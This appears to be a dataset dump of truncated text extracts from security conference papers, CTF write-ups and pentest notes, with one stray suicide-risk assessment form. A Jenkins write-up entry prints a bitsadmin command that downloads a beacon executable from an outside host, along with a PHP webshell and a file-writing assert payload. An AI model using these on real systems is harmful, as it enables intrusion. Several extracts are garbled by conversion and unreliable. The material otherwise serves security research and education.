text
stringlengths
100
9.93M
category
stringclasses
11 values
Deanonymizing Tor Nathan S. Evans Christian Grothoff Nathan.S.Evans@du.edu christian@grothoff.org Colorado Research Institute for Security and Privacy University of Denver 1 Motivation • Tor is probably the most popular and widely used free software P2P network used to achieve anonymity on the Internet: – Tor has a stro...
pdf
Sound Effects Exploring acoustic cyber-weapons Matt Wixey August 2019 All references cited are at the end of the slide deck, available on the DEF CON media server! PwC • Research Lead for the PwC UK Cyber Security practice • PhD student at UCL • Previously worked in LEA doing technical R&D • Black Hat USA, DEF CON, IS...
pdf
漏洞描述 ⽇常逛zdi发现的洞,Orckestra C1 CMS 6.10存在 .net 反序列化漏洞,需要登录,成因是因 为 TypeNameHandling.Auto 环境搭建 下载 https://github.com/Orckestra/C1-CMS-Foundation/releases/download/v6.10/C1.CMS.6.10.zip 然后Visual Studio打开运⾏。 分析 根据cve描述和补丁对⽐发现漏洞点存在于Composite.dll,使⽤github的对⽐发现在此commit中增加了对反序列 化绑定类型的校验。 https://github.com/Orckestra/C1-CMS-Found...
pdf
Industrial Cybersecurity Landscape in 2020: Trends, Challenges, and Opportunities Dr. Terence Liu VP-GM, Trend Micro and TXOne Networks All product names, logos, and brands are property of their respective owners. All company, product and service names used in this deck are for identification purposes only. Use of ...
pdf
HCTF Writeup 队伍名:Albertchang Web 部分 Injection 看了下 cookie,发现 base64,解密: 看了好久没看得明白。主办方放了 Hint,是 Xpath 注入。百度之,在文库发现了一篇文章, 测试了下: 发现有回显 谷歌找到了一篇文章,经过尝试最终构造出 payload confused question 右键源码,发现 login.php.txt 提交一次我们可以发现: 而 parse_str 这一个函数会对内容进行两次 url 编解码。 大致意思是让我们绕过其中癿函数,以 admin 身份迚行提交 pasword,也就是我们只要是 admin 身份就可以,而 ...
pdf
Making (and Hacking) the DEFCON 17 Badge by Joe Grand aka Kingpin Me. electrical engineer. hardware hacker. daddy. Last Year This Year Hackers: The Next Generation Introduction Hardware Firmware Manufacturing DEFCON 17 Haiku Joe Grand aka Kingpin Electronic badge Audio input Affects LED output Sound and light combin...
pdf
Ghost Telephonist Impersonates You Through LTE CSFB Yuwei ZHENG, Lin HUANG Qing YANG, Haoqi SHAN, Jun LI UnicornTeam, 360 Technology July 30, 017 Who We Are •  360 Technology is a leading Internet security company in China. Our core products are anti-virus security software for PC and cellphones. •  UnicornTeam (h...
pdf
DevSecOps标准解读 中国信通院云大所 牛晓玲 牛晓玲 中国信息通信研究院 云计算与大数据研究所 云计算部 副主任 DevOps标准工作组组长,DevOps 国际标准编辑人。长期从事云计 算领域开发运维研究的相关工作,包括云服务业务功能测试以及运维 管理系统审查等相关工作。参与编写《云计算服务协议参考框架》、 《对象存储》、《云数据库》、《研发运营一体化(DevOps)能力 成熟度模型》系列标准、《云计算运维智能化通用评估方法》等多项 标准20余项。参与多篇白皮书、调查报告等编制工作,包括《企业IT 运维发展白皮书》、《中国DevOps现状调查报告(2019年)》等。 参与评估DevOps能力成熟度评估超过40个项目,具有丰富...
pdf
MAELSTROM Shane Steiger Attack Lifecycle Game Concept version .8 © 2016 ‘Are You Playing with a Full Deck?’ #cybermaelstrom github.com/maelstromthegame MAELSTROM: AN ATTACK LIFECYCLE GAME CONCEPT Maelstrom is a game concept and model meant to enable Education, Demonstration and Evangelism within Cyber Securi...
pdf
TAKING WINDOWS 10 KERNEL EXPLOITATION TO THE NEXT LEVEL – LEVERAING WRITE- WHAT-WHERE VULNERABILITIES IN CREATORS UPDATE Whoami • Morten Schenk • Security Advisor, Improsec ApS • Twitter - @blomster81 • Blog: https://improsec.com/blog/ • GitHub: https://github.com/MortenSchenk • What to expect from this talk • Windo...
pdf
http://null.co.in/ http://nullcon.net/ http://null.co.in/ Jugaad Linux Thread Injection Kit By Aseem Jakhar $whoami ● A Big Hello from India. ● Founder – null The open security community. ● Organizer – nullcon security conference. ● Chief researcher – Payatu Labs http://www.payatu.com ● Speaker at various security con...
pdf
Catching)Malware)En)Masse):)DNS)and)IP)style! ! Dhia!Mahjoub!dhia@opendns.com!@DhiaLite!! Thibault!Reuille!thibault@opendns.com!@ThibaultReuille!! Andree!Toonk!andree@opendns.com!@atoonk!!!! Part!1:!Catching!Malware!DNS!style! !FasFlux!botnets!as!proxy!networks! Part!2:!Catching!Malware!IP!style! !ASN!graph! !Suspiciou...
pdf
Lost and Found Certificates Ian Foster & Dylan Ayrey Who We Are Ian Information Security Engineer CertGraph https://dns.coffee https://lanrat.com https://github.com/lanrat @LANRAT Dylan truffleHog WPA2-HalfHandshake-Crack Pastejacking Other stuff… https://github.com/dxa4481 dylanayrey@gmail.com The Problem A certifica...
pdf
Bluehat Shanghai 2019 | David “dwizzzle” Weston | Microsoft OS Security Group Manager 不断增强的 Windows 安全性 早上好 上海! PC 上的 Windows 熟悉的桌面体验 庞大的硬件生态 桌面应用兼容性 One Core OS 基础操作系统 应用和设备平台 运行时和框架 Xbox 上的 Windows Windows 10 界面体验 独特的安全模型 共享的游戏体验 IoT 中的 Windows 基础操作系统 应用和设备平台 运行时和框架 还有更多地方…… 适配不同形态设备 界面体验 支持不同设备场景 Windows 正在不断进化…… 恶...
pdf
Karl Koscher – @supersat Eric Butler – @codebutler Rev: July 8, 2013 Updated slides available from defcon.org and http://simhacks.github.io/  Applications live on your SIM card  Phones are dumb hosts – UI and connectivity only  Telcos own the SIMs, so they control the applications 2  These are cal...
pdf
1 (SSDLC) TWISC@NCKU 2 (SSDLC) 3 1-1 1-2 4 1-1 5 (System Development Life Cycle, SDLC) – (Define) • 6 – (Design) • – (Develop) • 7 – (Test) • – (Deploy) • 8 – (Maintain) • – (Change) • XXX… YYY… 9 SDLC v.s. SSDLC SDLC – – SQL Injection… SSDLC – 10 11 1-2 12 12 Web Web –– (SSDLC) (SSDLC) 13 2-1 2-2 2-3 2-4 2-5 2-6 2-7 ...
pdf
猫 鼠 游 戏 如 何 进 行 W i n d o w s 平 台 在 野 0 d a y 狩 猎 金权 安恒信息 自我介绍 ➢ 金权(@jq0904/银雁冰) ➢ 安恒信息猎影/卫兵实验室高级安全专家 ➢ 研究方向 • Windows平台漏洞挖掘与利用 • Windows平台在野0day狩猎 ➢ 演讲经历 • Black Hat USA 2022 • HITB Amsterdam 2021 • Blue Hat Shanghai 2019 ➢ 40+ Microsoft/Adobe CVE致谢 (7次在野0day致谢) ➢ 2020~2022 MSRC TOP 100 目录 1. 背景 2. 用不同的方法解决不同的问题 ➢ 为什么...
pdf
1 Java⼩trick之利⽤URL的file协议列⽬录 LxLN 前⾔ LxLO 正⽂ LxLP debug跟踪 LxLQ 总结 这个技巧感觉挺有意思,还是在微信群⾥的赛博回忆录,讨论的时候看到的⼀篇⽂章 0x01 前⾔ 2 接着和钧钧讨论的时候发现作者是这样玩的 感觉挺有趣,深深的破坏了我对file://这个协议的看法 以前⼀直以为只能读⽂件,没想到在java⾥⾯还能读⽬录,特记录⼀波 0x02 正⽂ 3 Plain Text 复制代码 平时我对file协议就是读⽂件 也就是类似file:///etc/passwd这样 但是在看那个⽂章的时候 看到作者是类似这样玩的file:///etc/ 然后钧和我也试了⼀下,并且...
pdf
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 WO IN THE UNITED STATES DISTRICT COURT FOR THE DISTRICT OF ARIZONA MDY Industries, LLC, Plaintiff/Counterdefendant, vs. Blizzard Entertainment, Inc.; and Vivendi Games, Inc., Defendants/Counterclaimants. __________________________________ Bli...
pdf
MouseJack: Injecting Keystrokes into Wireless Mice Marc Newlin / marc@bastille.net / @marcnewlin Marc Newlin Security Researcher @ Bastille Networks Agenda 1. Overview 2. Research Process 3. Protocols and Vulnerabilities 4. Vendor Responses 5. Demo 1. Overview Types of Vulnerabilities ● Forced Device Pairing ● Keystr...
pdf
Cyber-hijacking Airplanes: Truth or Fiction? Dr. Phil of Bloomsburg University @ppolstra http://philpolstra.com Captain Polly of University of <redacted> @CaptPolly Why This Talk? ● Lots of bold claims concerning the feasibility of cyber-hijacking ● Bold claims get lots of press ● Most people don't know enough to ev...
pdf
42 2020年12月 第 12 期(第33卷 总第280期)月刊 2020 年 第 12 期 电信工程技术与标准化 中国移动网络与信息安全专题 基于IPv6的资产管理系统概要设计与实现 李江1,李肖肖1,安宝宇2,付俊1,何申1 (1 中国移动通信有限公司研究院,北京 100053;2 中国移动通信集团公司信息安全管理 与运行中心,北京 100053) 摘 要 IPv6具备海量的地址空间,地址生成随机性强,对IPv6网络空间中的资产进行管理将面临许多新的挑战。本 文吸取了业界IPv6存活地址快速发现理论的核心思想,结合现在的网络特点,设计开发出基于IPv6的资产管 理系统,用于辅助对IPv6资产进行管理。 关键词 IPv...
pdf
MOSE: Using Configuration Management for Evil Presented By: Jayson Grace Legal Stuff I am not speaking on behalf of my employer (or any previous employers), nor am I here as a representative of my current or previous employers. My opinions do not reflect those of my current or previous employer, and are solely my ...
pdf
apache 0x00 apacheapache 0x01 apache per-servervirtualhost per-directorydirectorylocationfile apache 0x02 mod_proxy AP_DECLARE_MODULE(proxy) = { STANDARD20_MODULE_STUFF, create_proxy_dir_config, /* create per-directory config structure */ merge_proxy_dir_config, /* merge per-directory config s...
pdf
Maelstrom: Are you playing with a full deck?︎ Using an Attack Lifecycle Game to Educate, Demonstrate and Evangelize︎ ! #cybermaelstrom︎ Shane Steiger, Esq. CISSP︎ Shane Steiger © 2016︎ DEF CON 24︎ $ whoami︎ ~ messing with computers since 1989 - TIN, PINE, yTalk, Lynx, MUDs, etc. ︎ ~ 8 years in a large food manufactu...
pdf
互联网企业安全建设实践 北京站/3.29 靳晓飞 VIPKID安全中心 从这里说起 互联网企业安全建设整体思路 互联网企业面临安全挑战分析 互联网企业核心安全目标 互联网企业核心安全能力建设与提升 互联网企业整体安全视角 互联网企业基础安全体系建设框架 互联网企业安全建设蓝图 互联网企业安全建设如何落地实施 分阶段安全体系建设 如何评价企业安全建设的效果 基础安全全链路纵深防御架构 API 安全监控实践 需要对哪些API进行安全监控? • 注册接口 • 登录接口 • 找回密码接口 • 订单详情接口 • 收货地址接口 • 其他所有可能会被刷的API 安全监控目标设定 • 具备对高风险API被刷的分钟级主动发 现和感知能力,并可与安全防...
pdf
• What is it? • Why do it? • Who does it? • Dark Clothing - Black. - Dark Blue. • No Flashy Logos - Nothing that will single you out. - Nothing Large. - If you must have logos, support your police. • Footwear - Thick Soles. - Hiking Boots. - Combat Boots. - Dr. Marten Style. • Disposable - Old clothes. - Thick Pants....
pdf
英⽂文地址 翻译:blood_zer0、Lingfighting 如果翻译的有问题:联系我(Lzero2012)。匆忙翻译肯定会有很多错误,欢迎⼤大家⼀一起讨论Go语⾔言安全能⼒力力建设。 Go语⾔言-Web应⽤用程序安全编码实践是为了了给任何使⽤用Go进⾏行行编程与Web开发的⼈人员提供指导。 这本书是Checkmarx安全研究团队共同努⼒力力的结晶,它遵循OWASP安全编码实践快速参考指南。 这本书主要的⽬目的是为了了帮助开发⼈人员避免常⻅见错误,同时通过"实践⽅方法"学习编程语⾔言⼼心得。本书提供了了关于"如何安全执⾏行行"详细信息,展示了了在 开发过程中可能出现的安全问题。 Checkmarx是⼀一家应⽤用程序软件安全公司,公...
pdf
Phishing and Online Scams in China Joey Zhu Trend Micro Inc. Who I am: • Worked for Trend Micro Inc. (2005 – Present) • Rich experience with virus sandbox (2005 – 2008) • Rich experience as a JavaScript analyzer (2008 – Present) • Web threat expert, focusing on HTML/Javascript exploits • Now interested in phi...
pdf
DEFCON! 2015! Introduction to SDR & the Wireless Village ! Who the Frig...! satanklawz! ! DaKahuna! It takes a village...! Rick Mellendick! Zero_Chaos! Marauder! Terrible! ! RedBaron! SimonJ! Spiral Suitcase! 0xAA! Agenda for the next 45 minutes! ● Ham Radio Transceivers! ● SDR Rx/Tx! ● Antenna Theory from Ham to SDR ...
pdf
Browser Script Engine Zero Days in 2018 Elliot Cao Trend Micro 2019-05-30 Whoami • Previous occupation is electrical engineer • Joined in Trend Micro in 2017 • Sandbox developer • Started browser vulnerability research in 2018 • Focus on browser script engine • Lei Cao (@elli0tn0phacker) Agenda • Browser Zero Days in ...
pdf
& Privileged&Confidential 01 • • 82 5 Privileged&Confidential 5 Privileged&Confidential 0 & 2 Privileged&Confidential Privileged&Confidential & 01 T Privileged&Confidential T Privileged&Confidential • O% & S1 S& • 05 R1 • 0pC 1P 4Op • t4aC81 Privileged&Confidential Privileged&Confidential & 02 Privileged&Confide...
pdf
Hackers and Disasters: How To Reboot Society With Style On A Budget Brad “RenderMan” Haines Hacker / Security Consultant RenderLab.net, Churchofwifi.org, NMRC.org render@renderlab.net Defcon 17 July 31st – August 2nd, 2009 Las Vegas, Nevada http://www.renderlab.net/projects/presentations So You Survived The Apocalyps...
pdf
百度数据中心自动化平台演进 百度系统部 高级项目经理 陆川 2015-04-24 目录 IDC自动化平台的定义 1 2 3 百度IDC自动化平台演进 IDC自动化平台的未来 IDC内部 百度IDC运营平台 分布式集群 Web/DB 业务监控 部署 上线 业务运维 IDC运营平台 资源管理 容量管理 监控报警 资源管理 网络 交换机上架 服务器 上架 DNS 负载均衡 初始化 故障处理 供电 空调 冷机 机房 。。。 。。。 。。。 变更管理 百度IDC自动化平台-why • 百度每年在IDC上的投入? • 上架交付3000台机器需要多长时间? 百度IDC自动化平台-why 2010 2011 2012 2013 2014 百度服务器...
pdf
自 动 化 漏 洞 扫 描 系 统 开 发 和 应 用 李斌 系 统 建 设 背 景 Ø 互联网应用系统大量使用开源软件和应用组件,且系统迭代快,可能 存在各种安全漏洞,依靠手工检测需要投入大量人力。 Ø 通过建设自动化漏洞扫描系统,实现安全资产统一管理、漏洞自动化 检测和安全漏洞生命周期管理,提升漏洞发现效率和能力,降低漏洞 被利用风险。 系 统 建 设 目 标 ü IP和端口 ü 中间件及版本 ü 组件库及版本 ü 数据库 ü 进程 ü 运行用户 ü 域名和URL ü 端口开放 ü 系统和中间件漏洞 ü 弱口令、未授权访问 ü Web安全漏洞 ü 漏洞确认 ü 漏洞复核 ü 漏洞跟踪和管理 ü 统计和报表 安全资产 管理 漏洞自...
pdf
Irongeek.com Adrian Crenshaw Irongeek.com  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m just a geek with time on my hands  (ir)Regular on the ISDPodcast http://www.isdpodcast.com  Researcher for Tenacity Institute http://www.tenacitysolutions.com Irongeek...
pdf
Breaking Wind: Adventures in Hacking Wind Farm Control Networks Jason Staggs, Ph.D. University of Tulsa Tulsa, Oklahoma whoami • Security researcher – Focused on control systems and network security • PhD in Computer Science from The University of Tulsa – Cellular networks, security engineering and forensics • Presen...
pdf
利用AI检测隐蔽的C2通信 AI for Detecting Covert C2 Communication 背景 0 1 C2技术发展 明文传输 加密混淆 公共协议(如TLS) 正常服务(如Twitter) 行业统计 2020年,加密的C2通信已达70%。 ——Cisco 2020年Q1,67%的加密C2采用的TLS协议 ——WatchGuard 防的策略 0 2 检测手段 局限 签名特征 难以应对 加密载荷 统计规则 不精确 机器学习模型 鲁棒性低 过拟合 最具 前景 应用AI的难点 0 3 C2样本 1. 辨识度低 2. 数据量少 3. 特征维度少 4. 随机性强 Cisco的成功经验 0 4 TLS协议 TLS握手特征 Cl...
pdf
Raw Linguist Analysis and Word Count Output for Big Five and Dark Triad traits Talk Title : Can Twitter help expose psychopath killer’s traits Presenters: Chris Sumner & Randall Wald Abstract: Recent research has identified links between Psychopaths and the language they use (Hancock et al 2011), with media reports...
pdf
The End of the PSTN As You Know It DEF CON 20 July 28, 2012 Agenda “Islands of VoIP” Tool release UC Federation Surprise UCF Vendor Research Open Source Software Avaya Proprietary - Do not reproduce or distribute without express written consent Small Disclaimer These are our opinions based on experience Not...
pdf
CTF-WP-Nu1L CTF-WP-Nu1L WEB Game who_are_you? show_me_your_image PWN PWN1 PWN2 MISC 24word Reverse Flat srcleak py Crypto sm4 dp WEB Game who_are_you? xxe show_me_your_image 34 aaa.png/aaaaaa.png/aaaaaaaaa.png hint…/root/flag.txt # coding: UTF-8 import base64 import requests import urllib import re PWN PWN1 url="http://...
pdf
优化ARL的⼀些坑的细节  0x00 前⾔  这篇⽂章主要是针对前⾯那篇关于漏扫优化的具体实践,实践时候也碰到了⼀些预想不到的问题包 括⼀系列ARL⾃身的bug问题。觉得有必要记录⼀下,也避免哪天硬盘挂了没备份忘记了怎么修改 的。 0x01 如何部署和调试代码  我通常是不进⾏单步调试的,毕竟ARL是python写的,有报错看报错,然后打印打印关键信息基本 我就知道哪⾥有问题要怎么改了。 我按照官⽅的安装⽅式是⼀键部署的docker版本,通过docker-compose来进⾏管理。 可以看到分为好⼏个容器,除了db和mq,剩下三个应该都是有具体ARL代码的。⽽我们前⾯所说 的例如增加host碰撞、增加扫描等实际上都是在arl_wor...
pdf
mdns 0x00 0x01 systemd-resolved ​ ​ ​ ​ ​ ip.dst_host==224.0.0.251 and udp.port==5353 0x02 mdns ​ systemd-resolve resolvectl avahi-* ​ ​ ​ ​ ​ ​ 0x03
pdf
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 ...
pdf
PENTEST ETO(200) 学到了姿势,盲注还可以这么搞= =测试了几发,发现是 xpath 的注入: 然后爆破不出来,根据提示说要利用可见字符,于是学到新技能: 就是利用: 测试 http://eto.sctf.xctf.org.cn/?action=user&id =6 or count(//user)=5(确认user节点存在) http://eto.sctf.xctf.org.cn/?action=user&id=6 or count(//user/password)=5(确认password字段 存在) http://eto.sctf.xctf.org.cn/?action=user&id=6 or str...
pdf
议题: WebLogic XMLDecoder 反序 列化之殇 演 讲人: 谢 小强 ID: Badcode 部 门/职 位: 404实验室/安全研究员 研究方向: Web 安全 标签 : Java Blog: https://badcode.cc/ 帅 什么是 XMLDecoder ? 01 02 03 XMLDecoder 解析 流 程 XMLDecoder 反序 列化安全风 险 04 WebLogic 中的 XMLDecoder 漏 洞 01 什么是 XMLDecoder ? XMLEncoder • 是 ObjectOutputStream 的互补替换 • 将 Java 对象转换成 XML Test.xml void标签...
pdf
笔记本: 用户运营 创建时间: 2020/4/4 11:24 更新时间: 2020/4/4 12:32 作者: 邵云蛟 URL: https://mp.weixin.qq.com/s/qgChhHyfle0DXBMTsm-vtQ 星球圆桌:如何提升社群活跃度? 分享人:邵云蛟 旁友圈PPT学习社群创建者 之前受知识星球运营采访,聊了一些如何提升社群活跃度的方法,后来,在运营的过程中,又有 了一些新的想法,在这里分享一下。 如果你经常看星球活跃榜,会发现旁友圈 PPT 学习社群,经常会出现在前3名之中,截止到目 前,星球定价365元,人数已经超过了25000人,主题数超过40000条,评论数近16W条,应该算 是比较活跃了,对吗? 那...
pdf
Win at Reversing API Tracing and Sandboxing through Inline Hooking Nick Harbour 2 Agenda  Reverse Engineering Primer  Approaches to Dynamic Analysis  Inline Hooks  Advantages Over Other Techniques  Usages 3 Reverse Engineering Primer  Reverse Engineering techniques can be devided into two categories: Static and...
pdf
Self-Publishing and the Computer Underground DEFCON 15 • 4 August 2007 Myles Long Director of Depravity, CULT OF THE DEAD COW myles@cultdeadcow.com • http://www.cultdeadcow.com/ Christian “RaD Man” Wirth Founder, ACiD Productions; Member, cDc’s Ninja Strike Force radman@acid.org • http://www.acid.org/ Rob “Flack” O’Har...
pdf
浅谈syscall Author:⽩袍 ⼀、简介 Syscall 即 system call ,是最近在红队领域⽐较热⻔的⼀种⼿法,主要⽤来规避AV、EDR类 的设备检测。 Windows有两种处理器访问模式:⽤户模式和内核模式。使⽤Ring级来描述就是⽤户模式为 Ring 3,内核模式为Ring 0,如图: ⽤户的代码运⾏在⽤户模式下,⽽驱动程序和操作系统代码运⾏在内核模式下,两者相互隔 离,避免⽤户级别的代码影响到操作系统的稳定。 ⽤户在调⽤⼀些与系统相关的API函数时,实际上是先从⽤户模式切换到内核模式,调⽤结束 后再回到⽤户模式,通过 Process Monitor 可以看到这个过程: ⽤户代码调⽤ CreateFile()...
pdf
1 php⽂件上传处理流程简单分析-php在流量层⾯ 绕waf的姿势 boundary值处理 body处理 filename的特殊处理 作者:⽩帽酱 php⽂件上传处理在 main/rfc1867.c 中的 rfc1867_post_handler函数 测试环境 PHP 7.1.9 boundary值处理 2 SAPI_API SAPI_POST_HANDLER_FUNC(rfc1867_post_handler) C 复制代码 if (SG(post_max_size) > 0 && SG(request_info).content_length > SG(post_max_size)) {    sapi_modul...
pdf
Jenkins PCIWriteUP println'"bitsadmin'/rawreturn'/transfer'getfile'https://xxxxxx.myqcloud.com/beacon.exe'C:\ \\Windows\\Temp\\beacon.exe".execute().text tomcat ​ 4imagesgetshell <?php'$_GET[a]($_GET[b]);?> https://10.10.6.188/search.php?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%2 9,base64_decode%...
pdf
Telerik.Web.UI for ASP.NET AJAX某版本存在 任意文件下载漏洞: 在做渗透测试任务时,遇到一个ASP.NET站点.通过目录扫描发现存在 Telerik.Web.UI.WebResource.axd 路径。此路径是第三方控件 Telerik UI FOR ASP.NET 在 web.config 中映射的 handler 查阅历史相关漏洞后主要有以下 CVE 2014-2217 CVE-2017-11317 CVE-2017-11357 CVE-2017-9248 CVE-2019-18935 上面这几个已知漏洞基本都是围绕默认 key 实现序列化配置类上传恶意文件,后者是前 者禁用 ../ 后...
pdf
1 Intelligent Debugging for Vulnerability Analysis and Exploit Development Security Research 2 Who am I? ● Damian Gomez, Argentina ● Being working @ Immunity since early 2006 ● Security Research focusing on: – Vulnerability analysis – Exploit development ● VisualSploit lead developer ● Main developer of Immunity De...
pdf
RWCTF Nu1L forensics ccls-fringe { "last_write_time":1532281822000000000, "language":2, "lid2path":[ ], "import_file":"/home/flag/fringe.cc", "args":[ "%clang", "/home/flag/fringe.cc" ], "dependencies":[ "/usr/include/c++/8.1.1/ext/atomicity.h", "/usr/include/asm-generic/...
pdf
ModScan A SCADA MODBUS Network Scanner Mark Bristow mark.bristow@gmail.com Agenda • Brief introduction to SCADA Systems • The MODBUS Protocol • MODBUS TCP • ModScan Demonstration • ModScan Project Information • Q&A Disclaimer • The material in this presentation is to be used for authorized security scanning/ auditing...
pdf
Struts2 组件安全概览 (Skay) Skay@Ateam ⼀、组件概述 1.关键词 框架、MVC、Java Web 2.概述 struts2是基于MVC设计模式的Java Web框架技术之⼀,struts2框架按照MVC的设计思想把 Java Web应⽤程序分为控制层,包括核⼼控制器FilterDispatcher和业务控制器Action,模型 层,包括业务逻辑组件和数据库访问组件,视图层,包括HTML、JSP、struts2标签等,也 可以认为struts是⼀个⼤的servlet。 关于Xwork XWork是⼀个标准的Command模式实现,并且完全从web层脱离出来。Xwork提供了很多核 ⼼功能:前端拦截机(inte...
pdf
Xprobe Remote ICMP Based OS Fingerprinting Techniques Ofir Arkin Managing Security Architect © 2 0 0 1 @ S T A K E , I N C . 2 Agenda  What is Xprobe?  Xprobe 101  Examples  The Static Engine  The Signature Based Engine  More Examples  Known Problems, Detecting Xprobe’s Activity, To Do List  Questions ©...
pdf
2020-2021年 元宇宙发展研究报告 @新媒沈阳 团队 王儒西 博士后 向安玲 博士生 主笔 0.98版 2021.09.1 6 理念篇 目 录 1. 孕育元宇宙 2. 元宇宙是什么? 3.虚拟与现实的关系 4. 元宇宙的理论框架 5. 对元宇宙的几点展望 1 孕育元宇宙 元宇宙前传:《雪崩》 元宇宙概念的提出: 1992 年,Neal Stephenson的科幻小说《Snow Crash》中提 出 了 “metaverse(元宇宙,汉译本译为“超元域”)”和“化身 (Avatar)”这两个概念。书中情节发生在一个现实人类通过 VR设备与虚拟人共同生活在一个虚拟空间的未来设定中。 元宇宙前传:《雪崩》 现在,阿弘正朝「大...
pdf
THE JOP ROCKET: A SUPREMELY WICKED TOOL FOR JOP GADGET DISCOVERY, OR WHAT TO DO IF ROP IS TOO EASY Dr. Bramwell Brizendine Dr. Joshua Stroschein DEF CON 27 August 9, 2019 DR. BRAMWELL BRIZENDINE • Assistant Professor of Computer and Cyber Sciences at Dakota State University. • Creator of the JOP ROCKET. • Interests...
pdf
The Art of Software Security Assessment - Identifying and Preventing Software Vulnerabilities The Art of Software Security Assessment - Identifying and Preventing Software Vulnerabilities 1 目录 1. The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities .... 6 2. Table of Cont...
pdf
How to Hack Your Mini Cooper: Reverse Engineering CAN Messages on Passenger Automobiles Jason Staggs University of Tulsa Institute for Information Security Crash Reconstruction Research Consortium jason-staggs@utulsa.edu ABSTRACT With the advent of modern vehicular technology, the computerized components of p...
pdf
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! Orange Tsai Taiwan No.1 About Orange Tsai The most professional red team in Taiwan About Orange Tsai The largest hacker conference in Taiwan founded by chrO.ot About Orange Tsai Speaker - Speaker at several security conferences Black Hat USA,...
pdf
Church of WiFi Wireless Extravaganza Today’s Brethren: Thorn theprez98 Renderman Who Are The CoWF? Q: Pirates? Ninjas? Pirates with stealthy Ninja skills? Ninjas who say "Arrgh"? A #1: A “Church” where they do “WiFi Voodoo” Who Are The CoWF? A #2: A bunch of Monkeys who wear Pope hats The Problem… The Problem… • No ski...
pdf
漏洞原理:当开启了分片上传功能时,fastadmin 会根据传入的 chunkid ,结合硬编码后缀来命名和 保存文件,攻击者可预测文件上传路径;此后攻击者提交 "分片合并" 请求时,fastadmin 将会根据传入 的 chunkid ,去除了上一步操作中文件名的硬编码后保存新文件,导致任意文件上传。 前期准备 1. 该接口至少需要普通用户权限,我们可以先在前台注册一个用户然后登录 2. 需要修改默认配置 才能使用分片上传功能。设置 application/extra/upload.php 下的 chunking 项为 true 3. 可使用 application/index/controller/Ajax 下的 u...
pdf
©2003-2007 Check Point Software Technologies Ltd. All rights reserved. Proprietary and confidential. puresecurity “A Crazy Toaster : Can Home Devices turn against us?” “A Crazy Toaster : Can Home Devices turn against us?” Dror Shalev SmartDefense Research Center drors@checkpoint.com 2 ©2003-2007 Check Point Softwa...
pdf
1 ⽆java环境修改字节码 @yzddmr6 ⾃从实习之后发现⾃⼰缺乏的东⻄还有很多,跟其他优秀的⼈相⽐还有很⼤的差距,所以最近⼀直在学习 充电,⽂章也写的少了。上次巅峰极客线下赛跟yan表哥⾯了基,⼀起磕了⽠⼦聊了聊天。结合当时的⽐赛 情况回来之后想搓⼀个蚁剑的后渗透插件,今天想跟⼤家分享⼀下其中的⼀个点:⽆java环境如何修改字 节码。 在蚁剑改造计划之实现JSP⼀句话中,当时为了解决硬编码字节码的问题采⽤了额外参数的⽅式来传参。 但是同时带来的问题就是键名的固定跟额外带来的编码问题,很容易成为⼀个特征。 例如 蚁剑没有java环境,所以没办法像冰蝎⼀样调⽤asm框架来修改字节码。但是我们也不需要asm框架那么 强⼤的功能,实...
pdf
Pentesting ICS 101 By Arnaud SOULLIE Who am I? Arnaud soullié Senior security auditor Windows Active Directory Can a Windows AD be secured ? JSSI 2014 (French, sorry) SCADA (BHEU14, HIP15, BruCon, BSLV15, DC24) Wine tasting / Motorbike riding (we’re not going to talk about it today) Sorry for the Fre...
pdf
EXTRACTING CNG TLS/SSL ARTIFACTS FROM LSASS MEMORY Jake Kambic 2016 Defcon ii TABLE OF CONTENTS Page LIST OF TABLES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . iv LIST OF FIGURES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v LIST OF ACRONYMS & ABBREVIATIONS . . . . . . . . . . . . ...
pdf
Chip & PIN is definitely broken Credit Card skimming and PIN harvesting in an EMV world Andrea Barisani <andrea@inversepath.com> Daniele Bianco <daniele@inversepath.com> Chip & PIN is definitely broken ­ v1.3  Copyright 2011 Inverse Path S.r.l. Adam Laurie <adam@aperturelabs.com> Zac Franken <zac@aperturelabs.com> What...
pdf
… ’ ? • ’ ? • • ’ ? • • • ’ ? • • • • ’ ? • • • • ’ ? • • • • • … • • • • – • – • – – • – – • – – • – • – – • – • – – • – • – – • – • – – • – – • – – • – – • – – • – – • • – – • – – • –
pdf
Crisis Intervention Documentation & Suicide Risk Assessment Immediate State Suicide in progress Call 911 immediately & ascertain location Influence of drugs / alcohol If yes, list: _____________________ Potential suicide methods nearby Self harm in progress / just completed Suicidal Ideation & Intent ...
pdf
Metamorphic Viruses Sean O‟Toole Metamorphism Defined  “Body-polymorphics” (Szor, 127)  “Self Mutating Code” (Lord Julius)  “The Art of Extreme Mutation” (Mental Drill) Brief Description of Sections  1) Disassembler: used to disassemble host, most often into a linked list of op codes.  2) Depermutater: removes s...
pdf
Abusing Bleeding Edge Web Standards for AppSec Glory Bryant Zadegan Ryan Lester Advisor/Mentor CEO, Co-Founder Mach37 Cyph keybase.io/bryant hacker@linux.com @eganist @TheRyanLester • Does AppSec stuff, usually. • Mentors security startups, sometimes. • “Mentors” others on AppSec, occasionally. • Pai...
pdf
Jenkins 历史RCE漏洞梳理 环境下载,修改中间版本号从⽽下载任意版本 https://updates.jenkins-ci.org/download/war/2.31/jenkins.war, https://get.jenkins.io/war/2.302/jenkins.war Jenkins 中 java 版本的使⽤情况 1.612 以后是 java 7 2.54 之后是 java 8 2.164 之后是 java 8 或者 java 11 https://github.com/gquere/pwn_jenkins 相对⽐较全的 jenkins 总结 Jenkins 的三种模式 1. Full Access 在该全...
pdf
